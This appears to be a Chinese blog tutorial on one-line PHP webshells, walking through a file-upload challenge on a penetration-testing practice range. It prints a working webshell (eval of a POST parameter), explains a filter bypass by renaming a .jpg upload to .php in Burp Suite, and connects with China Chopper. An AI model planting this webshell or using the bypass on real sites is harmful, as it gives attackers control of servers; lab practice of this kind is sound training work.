1. 程式人生 > 其它 >一句話木馬上傳(webshell)

一句話木馬上傳(webshell)

一句話木馬是利用檔案上傳漏洞,往網站傳入點上傳一句話木馬從而獲取和控制整個網站目錄。

一句話木馬程式碼:<?php @eval($_POST['CMD']); ?>

程式碼分析:@符號表示即使後面執行錯誤也不報錯,eval()函式表示將括號裡的字串當做程式碼來執行,$_POST['CMD']表示傳一個引數,引數名為CMD,傳入的引數為之後中國菜刀,冰蠍用來連線。

一句話木馬實現的條件:1.木馬能夠上傳成功,並且不會被kill掉。

                                        2.知道木馬的路徑。

                                        3. 上傳木馬能夠正常執行。

 

這裡我們用安鸞滲透平臺靶場檔案上傳的第二題來進行演示

 

 登入進來後我們在收賬管理下面發現有一個傳入點

試著將本地一句話木馬傳入進去

 

 網站做了過濾不能上傳php檔案,我們將字尾改成jpg再看看效果(這裡我用burpsuite方便大家看的更詳細一點)

 

 發現將字尾改成jpg就可以上傳成功,那麼我們在burp軟體裡再將jpg字尾改成php看看效果

 

 

 

發現效果一樣說明我們一句話木馬上傳成功了!!

接著我們找到上傳的路徑發現是upload/1.php

下面用菜刀進行連線

 

 

 

 連線成功!!!!

最後就是找flag了,這裡就不在進行更多的演示